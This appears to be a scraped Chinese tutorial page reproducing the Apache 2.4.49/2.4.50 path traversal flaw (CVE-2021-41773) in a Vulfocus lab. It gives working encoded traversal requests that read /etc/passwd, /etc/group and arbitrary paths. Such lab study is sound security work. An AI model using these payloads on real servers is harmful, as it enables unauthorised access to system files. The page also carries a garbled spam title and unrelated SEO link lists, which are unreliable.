当前位置: 首页 > news >正文

佛山网站建设的市场全国人大常委会委员长

佛山网站建设的市场,全国人大常委会委员长,北京市场调研公司,网站建设工作量统计表中间件安全:Apache 目录穿透.(CVE-2021-41773) Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等&#xff0c…

中间件安全:Apache 目录穿透.(CVE-2021-41773)

Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。


目录:

中间件安全:Apache 目录穿透.(CVE-2021-41773)

Apache 目录穿透:

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客

漏洞测试:

第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )

第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.


Apache 目录穿透:

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客


漏洞测试:

第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )


第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.

# 查找存储用户账户信息,包括用户名和用户 ID
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd# 查找存储组信息,包括组名和组成员
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/group# 如果需要查看别的目录信息,则替换后面的就行.
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/目录路径

    

    

    

学习链接:第59天:服务攻防-中间件安全_CVE复现_IIS_Apache_Tomcat_Nginx_哔哩哔哩_bilibili

http://www.tj-hxxt.cn/news/126515.html

相关文章:

  • 网站做三级等保费用疫情最新消息
  • 深圳网站建设 易通鼎百度竞价排名是以什么形式来计费的广告?
  • 广州黄埔区做网站培训机构广告优化师是做什么的
  • php网站开发实用技术答案余姚网站制作公司
  • 内存128mb做网站够吗链接搜索
  • 法律网站建设深圳做网站
  • 专业邯郸做网站5118站长工具
  • 做网站需要会语言吗济南做seo排名
  • 怎么自己做网站的优化电子商务与网络营销题库
  • 中国摄影网站排名优化工具
  • 什么网站做热能表好简述搜索引擎优化的方法
  • 设计师推荐网站欣赏信息流优化师简历模板
  • 贵州省建设厅网站查seo技术培训山东
  • 网站怎么定位软文推广是什么
  • 做网站一个月工资360网站收录提交
  • 最权威的网站推广公司互联网整合营销推广
  • 安康网站建设技巧搜索引擎优化入门
  • 有什么平台可以做网站淄博网站营销与推广
  • 纯flash网站价格网络营销专业学什么课程
  • 幼儿园网站模板怎么做北京seo方法
  • 苏州建设工程人才招聘网信息网站中国关键词
  • 成都网站建设 今网科技网站源码下载
  • 武汉专业网站做网页常见的网络营销方法有哪些
  • 男女做爰视频网站在线企业网络营销
  • 中国国防建设网站营销型网站建设
  • wordpress 繁體西安关键词优化服务
  • server2008做DNS与网站seo工具优化软件
  • 牟平网站制作公司软文推广文章范文
  • 贵州安顺住房城乡建设网站google推广 的效果
  • 青岛网站建设找润商怎么做公司网站推广